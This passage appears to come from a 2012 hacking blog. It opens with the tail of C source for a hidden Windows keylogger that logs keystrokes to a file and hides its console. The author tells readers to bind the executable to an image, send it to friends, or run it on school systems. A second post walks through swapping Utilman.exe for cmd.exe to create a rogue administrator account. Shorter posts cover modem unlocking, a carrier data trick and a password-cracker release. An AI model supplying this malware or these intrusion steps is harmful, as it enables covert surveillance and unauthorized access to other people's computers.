    fprintf(OUTPUT_FILE, "%s", ".");
    else
    fprintf(OUTPUT_FILE, "%s", &key_stroke);
    fclose (OUTPUT_FILE);
    return 0;
    }
    /* *********************************** */
    void Stealth()
    {
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth,0);
    }

     

    3. Now Compile and execute the program using ctrl+F10.

    4. Hence your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
    you can see the log.txt file where you save the file.

    5. You can also bind the .exe file with image or any files and send it to your friend.
    If you have physical access to your college/school system,then copy the exe file in that system and run it.
    For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.

    The end! Have a nice day…


    How to Crack Windows 8 Password?


    After cracking Windows XP and 7 admins password, its time to crack newly born Windows 8 password. Windows 8 comes with an strong security login hence here we would use live Linux cd to crack its password in just few mins. So lets look below and enjoy the post.

    The Procedure-

    Step 1. Get a Linux Live Cd
    Step 2. Boot the cd
    Step 3. Go to C drive>Windows> System 32 folder
    Step 4. Rename "Utilman.exe" file to "Utilman1.exe"
    Step 5. Now rename "cmd.exe" file to "Utilman.exe"
    Step 6. Restart your PC and remove the cd properly
    Step 7. Hence you will get an screen of user login afterwards.
    Step 8. Now click on "Ease of access"(left bottom corner of the screen) and cmd.exe will pop up like this below-

    demo

    Step 9. Type "net user",without quotes in command prompt it will show all users list
    Step 10. Now you have to add a new user so type

    net user /add krackoworld kow

    here your new username is "krackoworld" and its password is "kow"
    Step 11. Now you have to make this user as a administrator ,so type

    net localgroup administrators krackoworld /add

    Step 12. Restart your pc, and login with your new user here its "krackoworld" , give the password "kow".
    Step 13. Now its done ,now you may delete your old user account or change its password from control panel
    Step 14. But that's not end, your PC is to totally correct , to make it correct again boot with your Linux cd and go to C drive>Windows> System 32 folder , now rename "Utilman.exe" to "cmd.exe" and now rename "Utilman1.exe" to "Utilman.exe".

    All Done..!


    Latest Aircel 3G/3.5G HSDPA Hack 2012


    hack aircel 3g speeds 2012Yes its true now we can again hack Aircel 3g with super fast downloading in 2012. In my previous post, I have mentioned an simple trick of switching the network mode UMTS technique after getting connected to 2g signals on PC in Aircel but today the problem is that we don’t get 3g signals in our phone if we have any 2g plan activated. Hence to overcome this problem, today I am going to tell you an double data plan way of getting both 3g and 2g usage in which we get 3g signals for 1 or 2 month also.

    How to get 3G signals in Aircel again with 2g data plan?

    1. First of all recharge your mobile with one of the following combo plans in Aircel as given below.

    Aircel 3g hack 2012

    2. Secondly after activation of your choice pack, switch to UMTS in your phone settings and enjoy unlimited 3g plan with super fast downloads upto 7.6 Mbps.

    Precautions-

    1. Do not activate any 2g pocket internet plan for this trick.

    2. And this trick is a legal one that means after our 3g data plan with limited speeds overs and outs, we will get unlimited 2g data pack but the true profit is that we will also get 3g signals in our 2g data plan so we can surf very very fast than normal 2g pocket internet plans.

    That’s it! Enjoy…


    19 May 2012

    How to Unlock any Huawei and ZTE Modem in just 2 mins?


    huaweiOh Yes After an long long time break of my university exams, Today I am free and back to bring you the latest stuffs related to hacking and cracking as regularly on my blog. Feeling sorry for no comment reply of your queries and hope to be regretted very soon. Hence today we will learn an simple trick or method to Unlock/Crack any of the Huawei or ZTE Modem online in just couple of minutes by generating its unlock and flash code etc. So sit down below and see the magic.

    Why we need to Unlock these Internet Modems?

    The answer is quite simple that to use any operators SIMs like Airtel, Tata DoCoMo, Vodafone, BSNL, Idea, Reliance, Aircel etc. in these modems for web surfing and enjoy various data plans which suites us best.

    Procedure for Unlocking Huawei Modem:

    1. First of all visit http://a-zgsm.com/huawei.php and see this section below-

    unlock internet modems

    2. Now enter your Huawei Modem IMEI no. and Security code as given.

    3. Hence click on Calculator button and then after that, your Modem Unlock and Flash code will appear in a box to you.

    4. Note down the codes and when you use another operator SIMs, just enter the codes and your device will automatically be unlocked successfully. Enjoy Switching.

    5. All done!

    Procedure for Unlocking ZTE Modem:

    1. First of all visit http://a-zgsm.com/calculator/ and see this section below-

    Unlock ZTE modems

    2. Now enter your ZTE Modem IMEI no. and Security code as given.

    3. Hence click on Calculator button and then after that, your Modem Unlock and Flash code will appear in a box to you.

    4. Note down these codes and whenever you use another operator SIMs than of Modems operator, just enter the codes and your device will automatically be unlocked successfully. Enjoy Switching.

    5. All done!

    Also Note- To unlock these types of modems offline, many software's also comes into play to do this like DC Modem unlocker etc. Try Googling to get this…

    That’s it! Comments are welcomed pal!


    02 May 2012

    oclHashcat-Plus v0.08 Released - Fastest Password Cracker




    oclHashcat-Plus is Worlds first and only GPGPU based rule engine and Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker.

    Features
    • Free
    • Multi-GPU (up to 16 gpus)
    • Multi-Hash (up to 24 million hashes)
    • Multi-OS (Linux & Windows native binaries)
    • Multi-Platform (OpenCL & CUDA support)
    • Multi-Algo (see below)
    • Low resource utilization, you can still watch movies or play games while cracking
    • Focuses highly iterated, modern hashes
    • Focuses single dictionary based attacks
    • Supports pause / resume while cracking
    • Supports reading words from file
    • Supports reading words from stdin
    • Integrated thermal watchdog
    • 20+ Algorithms implemented with performance in mind
    • ... and much more

     

    Recent Posts

    Review this blog on Bloggers.com

    Recent Comments

    | KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |